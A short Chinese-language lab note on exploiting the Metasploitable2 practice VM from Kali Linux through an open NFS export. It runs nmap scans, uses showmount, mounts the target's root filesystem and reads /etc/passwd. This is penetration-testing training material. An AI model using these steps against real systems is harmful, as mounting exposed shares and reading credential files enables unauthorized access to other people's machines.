kali linux对Metasploitable2漏洞利用，nfs获取目标密码文件 笔记

NFS（Network File System）即网络文件系统，是FreeBSD支持的文件系统中的一种，它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中，本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件，就像访问本地文件一样。

实验环境：

攻击机：kali linux 
ip:192.168.172.134
目标机：Metasploittable2
ip:192.168.172.129

攻击过程:

step1:nmap 扫描

nmap 192.168.172.129

step2:进一步探测

nmap -sV -p 2049 192.168.172.129

step3:使用脚本探测

nmap --script=nfs-* 192.168.172.129

返回漏洞信息

step4:利用nfs导出主机信息

用到的工具：使用showmount命令确定“/”共享(文件系统的根)是否正在导出。可能需要安装nfs-common包才能使用“showmount”命令 apt-get install nfs-common showmount -e IP

目前已经集成在kali 中

showmount -e 192.168.172.129           //探测nfs是否可以导出

step5:查看导出内容

mkdir nfs_root                 //新建一个文件夹

mount -t nfs 192.168.172.129:/ ~/nfs_root -o nolock              //挂载目标

cat ~/nfs_root/etc/passwd          //查看目标密码